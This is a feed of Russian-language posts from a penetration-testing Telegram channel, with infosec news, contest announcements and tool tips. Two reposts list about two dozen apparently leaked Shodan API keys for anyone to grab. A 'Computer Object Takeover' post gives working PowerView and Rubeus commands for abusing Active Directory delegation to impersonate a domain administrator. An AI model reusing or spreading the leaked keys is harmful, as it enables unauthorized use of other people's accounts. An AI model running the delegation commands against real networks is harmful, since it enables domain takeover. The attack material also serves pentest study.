Похек
16.6K subscribers
2.09K photos
110 videos
243 files
3.07K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Похек
Поздравляю всех участников Awillix Pentest Award! Отдельно отмечу их ники. Надеюсь с коллегами по цеху продолжим далее развиваться и развивать сообщество ИБ в РФ.
Не забываю о своих словах

Пробив
@byqwert
@fr35b1
@WizaXxX
От себя добавил бы в номинирование @r00t_owl. Т.к. он занимается физическим пентестом в большинстве, а не техническим, поэтому в номинацию сложно было его вместить. Но его статьи всегда интересно читать и в жизни - это очень интеллигентный человек с интереснейшим опытом пентестов! Только что у него вышла статья, всем советую прочитать)

Bypass
@snovvcrash
@W0lFreaK
@maledictos
А здесь добавлю @i_bo0om. Т.к. история про продажный WAF заставила всех рассмеяться)

Fuck the logic
@i_bo0om
@byqwert
@Danr0

Ловись рыбка
@dmarushkin
@UstinovAlexander
@snovvcrash

Всем остальным коллегам выражаю благодарность, что отправляли свои кейсы и поучаствовали Awillix Pentest Award. Будем ждать в следующем году!
7❤‍🔥22
📡 2FA Bypass-техники

Немного
теории перед чтением статьи:
Двухфакторная аутентификация (2FA) – это мера безопасности, которая требует от пользователей предоставить две формы идентификации для доступа к учетной записи. Одна форма идентификации обычно является паролем, а другая – кодом, который генерируется отдельным устройством или отправляется посредством текстового сообщения или электронной почты.

Межсайтовая подделка запроса (CSRF) – это уязвимость, которая позволяет злоумышленнику выполнять действия от имени пользователя без его ведома или согласия.

💬Канал
➡️Статья

#2fa #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
51❤‍🔥1
Forwarded from Bug Bounty
Shodan keys : 🌴🍁

1. WB6B7tRAskjlmpVUrYfnU1CVGCIpUs1t
2. EMeKr6ZlBg5Kaim4FQqTnHddhh3Zwjis
3. 61TvA2dNwxNxmWziZxKzR5aO9tFD00Nj
4. CevVNIYrV6gUzMoxiMhcaO3JIJOmpCY1
5. Hgqwf9dHMIE157PNCeqVJc6TVvlyGKiP
6. xTbXXOSBr0R65OcClImSwzadExoXU4tc
7. TnzrcytxidVqp6Z38iH3xnmu77tjt6qm
8. PSKINdQe1GyxGgecYz2191H2JoS9qvgD
4🥰3🐳3🌚1
LFI bypass

#lfi #bypass
8
Forwarded from BI.ZONE
®️ Студенты, приготовьтесь: розыгрыш бесплатных проходок на OFFZONE 2023

Если вы еще не успели купить билет на конференцию, у нас приятная новость: можно получить бесплатные проходки, решив таски на нашей CTF-платформе.

Каждый день c 7 по 13 августа в 18:00 мы будем открывать по одному заданию. Всего их будет 6 в категориях crypto, reverse engineering, web и PWN.

Первый таск появится уже сегодня!

Количество поинтов зависит от вашей скорости: первый решивший задание заработает больше всего очков. 12 студентов с лучшими результатами получат бесплатные проходки на OFFZONE 2023.

Для участия нужно вступить в чат, зарегистрироваться и указать e-mail: победителей мы попросим прислать скан или фото студенческого билета.

Участвовать
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥3
Forwarded from Russian OSINT
😷 Как запретить поисковому роботу (web crawler) 👩‍💻OpenAI лазить на ваших сайтах?

"Предоставление GPTBot доступа к вашему сайту может помочь моделям ИИ стать более точными и улучшить их общие возможности, а также безопасность", — пишет OpenAI.

♋️👉 Чтобы запретить 🤖GPTBot доступ к вашему сайту, вы можете добавить в robots.txt вашего сайта:

User-agent: GPTBot
Disallow: /

https://platform.openai.com/docs/gptbot

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
📣 Участвуйте в конкурсе и получите бесплатный билет на OFFZONE

Приветствую всех!
🎟 Я рад объявить о конкурсе на бесплатный билет на конференцию OFFZONE.

Условия конкурса:
➡️Подписаться канал.
➡️Оставьте любой комментарий под этим постом.

Срок проведения конкурса:
🎁 Конкурс будет проходить с 7 августа по 14 августа 2023 года. Победитель конкурса будет объявлен 14 августа 2023 года.

🪲 Конкурс проводится при поддержке 🕐🕑🕒 BugBounty.

®️ Что такое OFFZONE?
OFFZONE — это всегда насыщенная программа, множество развлекательных и образовательных активностей, а также мощное комьюнити.
Здесь собираются безопасники, разработчики, инженеры, исследователи, преподаватели и студенты из десятков стран мира. В центре внимания — только хардкорный технический контент по кибербезопасности. А также очень интересные не формальные беседы с опытными специалистами, руководителями компаний и т.д.

🔥 Почему стоит участвовать в конкурсе?
Участие в конкурсе — это отличная возможность получить бесплатный билет на OFFZONE, а также познакомиться с интересными специалистами из нашей сферы и возможность встретить работодателя, если ты ещё работаешь в сфере ИТ/ИБ, но есть большое желание и мотивация.

Не упустите свой шанс!

Спойлер: в этом году коллеги подготовили, что-то особенное)

Участвуйте в конкурсе и получите бесплатный билет на OFFZONE!

📩 Канал | Сайт OFFZONE
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥553🔥1
Всем доброго времени суток. Решил упростить правила конкурса и убрать необходимое правило, оставлять ссылку на канал у себя в профиле. Так что погнали ещё активнее принимать участие!
2
⚡️ BloodHound Community Edition - новая эра.

BloodHound Community Edition (CE) — это новая версия популярного инструмента для визуализации и анализа привилегий Active Directory. BloodHound CE основана на коде BloodHound Enterprise (BHE), но имеет ряд улучшений, включая новый пользовательский интерфейс, поддержку новых источников данных и более быструю визуализацию графиков. BloodHound CE также является более гибкой и настраиваемой, чем BHE.

BloodHound CE может быть использована для обнаружения уязвимостей в привилегиях Active Directory, таких как привилегии, которые могут быть использованы для получения контроля над сетью. BloodHound CE также может быть использована для моделирования атак на Active Directory и оценки риска этих атак.

Вот некоторые из ключевых улучшений, которые были внесены в BloodHound CE:
➡️ Новый пользовательский интерфейс, который более удобен в использовании и интуитивно понятен.
➡️ Поддержка новых источников данных, таких как Azure Active Directory и AWS IAM.
➡️ Более быстрая визуализация графиков.
➡️ Более гибкая и настраиваемая конфигурация.

Установка BloodHound CE одной командой:
curl -L https://github.com/SpecterOps/BloodHound/raw/main/examples/docker-compose/docker-compose.yml | sudo docker-compose up

💬 Канал | ➡️ Читать далее | 💻 Github
Please open Telegram to view this post
VIEW IN TELEGRAM
22🔥1
Forwarded from Just Security
Новостной репортаж по следам церемонии награждения Pentest award. А кейсы финалистов проходят цензуру и скоро появятся в специальном выпуске журнала ][

stay tuned🙌
👍5❤‍🔥2🔥2
Не большой офф-топ закину. Не пользуйтесь библиотекой Telethon. Очень велик шанс потерять аккаунт, прочитать можно тут и на Reddit. Разраб отнекивается и говорит, что он не виноват. Но по факту у разных людей прилетает автоматически бан на акк, что ровняется удаление аккаунта навсегда, другим теневой бан прилетает. Мне ещё повезло, просто разлогинило везде, но и в аккаунт зайти не могу (получение кода по SMS отказывается работать). Если кто сталкивался с таким, отпишите в комментариях. пожалуйста.

P.S. @Jayref смог помочь, за что ему огромное спасибо
🫡31👾1
Forwarded from Proxy Bar
SHODAN keys успевайте

OefcMxcunkm72Po71vVtX8zUN57vQtAC
PSKINdQe1GyxGgecYz2191H2JoS9qvgD
pHHlgpFt8Ka3Stb5UlTxcaEwciOeF2QM
61TvA2dNwxNxmWziZxKzR5aO9tFD00Nj
xTbXXOSBr0R65OcClImSwzadExoXU4tc
EJV3A4Mka2wPs7P8VBCO6xcpRe27iNJu
mEuInz8UH1ixLGJq4oQhEiJORERVG5xc
lkY0ng0XMo29zEhzyw3ibQfeEBxghwPF
syeCnFndQ8TE4qAGvhm9nZLBZOBgoLKd
7TeyFZ8oyLulHwYUOcSPzZ5w3cLYib61
v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kik
dTNGRiwYNozXIDRf5DWyGNbkdiS5m3JK
kdnzf4fsYWQmGajRDn3hB0RElbUlIaqu
boYedPn8iDWi6GDSO6h2kz72VLt6bZ3S
FQNAMUdkeqXqVOdXsTLYeatFSpZSktdb
OygcaGSSq46Lg5fZiADAuFxl4OBbn7zm
XAbsu1Ruj5uhTNcxGdbGNgrh9WuMS1B6
nkGd8uVE4oryfUVvioprswdKGmA5InzZ
XYdjHDeJM36AjDfU1feBsyMJIj8XxGzD
EBeU0lGqtIO6yCxVFCWC4nUVbvovtjo5
2
Forwarded from SHADOW:Group
Новые возможности для Race Condition

Race Condition в Burp Suite стало искать еще проще, а все благодаря добавлению возможности отправки нескольких HTTP/2 запросов в одном TCP пакете. Данный способ значительно выигрывает в эффективности и позволяет побороть сетевые задержки при отправке отдельными запросами и находить уязвимости в приложениях с очень низким временным лимитом для атаки.

Сделать это можно закинув несколько запросов в Repeater, а затем объединив их в группу. В группе надо выбрать "Group send options" и выставить "Send Group in parallel" (смотри скрин ниже). Можно также использовать turbo-intruder с шаблоном по ссылке.

Потестить, как это работает, можно на данной лабе.

#web #race #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
Forwarded from Monkey Hacker
Computer Object Takeover

Завершая играться с AD, нашел достаточно интересный сценарий, связанный с абьюзом Generic

Если в сетке есть пользователь с правами GenericWrite, то возможно зайти с повышенными привилегиями на другой тачке

Данный сценарий возможен, т.к Generic позволяет изменять DACL 🔥


Для этого мы создаем новую учетку тачки. По дефолту параметр ms-DS-MachineAccountQuota позволяет всем пользователям домена добавлять до 10 учетных записей машин

SID в принципе и сами можете вставить, но решил чуть облегчить процесс 🐈

New-MachineAccount -MachineAccount aboba -Password $(ConvertTo-SecureString
'Test@123' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer -Domain dev.domain.local aboba -Properties objectsid | select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc02.domain.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}


После этого можно использовать тот же Rubeus, для получения RC4-хэша.

Rubeus.exe hash /user:aboba /password:Test@123 /domain:dev.domain.local

И затем юзаем s4u для повышения своих привилегий за счет получения TGS

Rubeus.exe s4u /user:aboba$ /rc4:4E35B802576F770E77851BAB9D4AE172 /impersonateuser:administrator /msdsspn:cifs/dc02.domain.local /ptt

Для облегчения я юзал PowerMad и PowerView

Bye-bye 🎧
Please open Telegram to view this post
VIEW IN TELEGRAM
3
Forwarded from Cybred
Black Hat USA 2023
Schedule
Presentations

DEF CON 31
Schedule
Presentations

Расписание (с описанием докладов) и презентации с Black Hat USA 2023 & DEF CON 31
❤‍🔥2
🎟 Всем привет! Для тех, участвует в конкурсе на розыгрыш билета OFFZONE - есть хорошие новости, мы с моим коллегой владельцем канала Что-то на пентестерском решили увеличить ваши шансы на выигрыш!

Всё просто. От вас требуется:
1️⃣ Оставить любой комментарий под этим постом и под этим
2️⃣ Быть подписанным на Что-то на пентестерском и этот канал

🏁 До конца розыгрыша осталось: 6 часов 🔥
Ровно в 00:00 по МСК 15 числа опубликуем победителя 😎
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥6👍211
Похек pinned a photo
Ну, что мы практически апнули 2000 подписчиков 😏
❤‍🔥62🆒1
И через 20 минут будет объявлен победитель!